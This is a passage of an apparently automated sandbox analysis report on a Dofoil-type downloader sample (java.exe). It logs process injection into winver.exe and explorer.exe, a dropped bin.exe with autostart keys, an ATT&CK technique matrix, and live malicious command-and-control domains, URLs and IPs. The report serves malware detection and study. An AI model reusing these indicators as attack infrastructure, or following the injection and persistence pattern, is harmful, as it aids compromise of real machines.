            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D20000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2500000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1520000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2750000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 15B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 660000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1030000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3030000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 10E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1180000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 24C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 940000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2D90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1050000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 4B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 990000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: B80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 190000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1480000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1120000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 460000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: AD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 930000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 790000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E00000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 14D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: F10000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe base: 1C0000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: java.exe, 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.1712577983.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: winver.exe, 00000002.00000002.2970934204.0000000000C9C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\java.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133474217072615071.txt VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		512
            Process Injection            		3
            Rootkit            		1
            Credential API Hooking            		111
            Security Software Discovery            		Remote Services1
            Credential API Hooking            		Exfiltration Over Other Network Medium21
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/Job1
            DLL Side-Loading            		11
            Registry Run Keys / Startup Folder            		1
            Masquerading            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager3
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication13
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Hidden Files and Directories            		Cached Domain Credentials111
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1364228 Sample: java.exe Startdate: 19/12/2023 Architecture: WINDOWS Score: 100 41 vcklmnnejwxx.pw 2->41 43 uyhgqunqkxnx.pw 2->43 45 2 other IPs or domains 2->45 53 Snort IDS alert for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 6 other signatures 2->59 10 java.exe 1 2->10         started        signatures3 process4 signatures5 67 Exploit detected, runtime environment starts unknown processes 10->67 69 Writes to foreign memory regions 10->69 13 winver.exe 1 4 10->13         started        18 conhost.exe 10->18         started        process6 dnsIp7 49 cmnsgscccrej.pw 216.218.185.162, 49735, 49737, 49738 HURRICANEUS United States 13->49 51 uyhgqunqkxnx.pw 104.131.68.180, 49736, 80 DIGITALOCEAN-ASNUS United States 13->51 39 C:\Users\user\AppData\Roaming\...\bin.exe, PE32 13->39 dropped 75 Creates autostart registry keys with suspicious names 13->75 77 Contains functionality to inject threads in other processes 13->77 79 Injects code into the Windows Explorer (explorer.exe) 13->79 81 4 other signatures 13->81 20 explorer.exe 16 8 13->20 injected 23 SearchApp.exe 13 13->23 injected 26 sihost.exe 13->26 injected 28 32 other processes 13->28 file8 signatures9 process10 dnsIp11 61 Contains functionality to inject threads in other processes 20->61 63 Writes to foreign memory regions 20->63 65 Creates a thread in another existing process (thread injection) 20->65 30 bin.exe 1 20->30         started        33 bin.exe 1 20->33         started        47 173.222.162.32, 443, 49730 AKAMAI-ASUS United States 23->47 signatures12 process13 signatures14 71 Antivirus detection for dropped file 30->71 73 Machine Learning detection for dropped file 30->73 35 conhost.exe 30->35         started        37 conhost.exe 33->37         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            java.exe89%ReversingLabsWin32.Downloader.Dofoil
            java.exe100%AviraHEUR/AGEN.1322420
            java.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\E38A1E29\bin.exe100%AviraHEUR/AGEN.1322420
            C:\Users\user\AppData\Roaming\E38A1E29\bin.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            https://login.windows.local0%URL Reputationsafe
            http://spaines.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://%s.dnet.xboxlive.com0%URL Reputationsafe
            https://rafd.https://r.a0%Avira URL Cloudsafe
            https://powerpoint.office.comxee0%Avira URL Cloudsafe
            http://uyhgqunqkxnx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://www.ng.com0%Avira URL Cloudsafe
            https://raka.rms_noco-VK0%Avira URL Cloudsafe
            https://searchapp.bundleassets.example/desktop/2.html0%Avira URL Cloudsafe
            http://cmnsgscccrej.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://vcklmnnejwxx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://excel.office.comcp0%Avira URL Cloudsafe
            https://activity.windows.comt0%Avira URL Cloudsafe
            https://xsts.auth.xboxlive.comm0%Avira URL Cloudsafe
            https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
            https://login.windows.local/0%Avira URL Cloudsafe
            https://assets.activity.windows.comer0%Avira URL Cloudsafe
            https://assets.activity.windows.coms0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vcklmnnejwxx.pw
            		216.218.185.162
            		truetrue
              		unknown
              uyhgqunqkxnx.pw
              		104.131.68.180
              		truetrue
                		unknown
                spaines.pw
                		216.218.185.162
                		truetrue
                  		unknown
                  cmnsgscccrej.pw
                  		216.218.185.162
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://uyhgqunqkxnx.pw/EiDQjNbWEQ/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://spaines.pw/EiDQjNbWEQ/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://cmnsgscccrej.pw/EiDQjNbWEQ/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://vcklmnnejwxx.pw/EiDQjNbWEQ/true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://assets.activity.windows.com/v1/assetssvchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://substrate.office365.us/api/v2.0/Users(SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://excel.office.comexplorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://substrate.office365.us/imageB2/v1.0/users/SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://outlook.office.com/M365.AccessSearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5SearchApp.exe, 0000000B.00000000.1824776823.0000024340CDC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://outlook.office.com/owaSearchApp.exe, 0000000B.00000000.1888579626.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://substrate.office.com/api/v2.0/Users(SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000002.3110068499.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schema.skype.com/MentionSearchApp.exe, 0000000B.00000000.1882247398.0000024B54FDE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://wns.windows.com/Lexplorer.exe, 00000003.00000002.3110068499.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://word.office.comexplorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://outlook.live.com/owaSearchApp.exe, 0000000B.00000000.1836526341.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
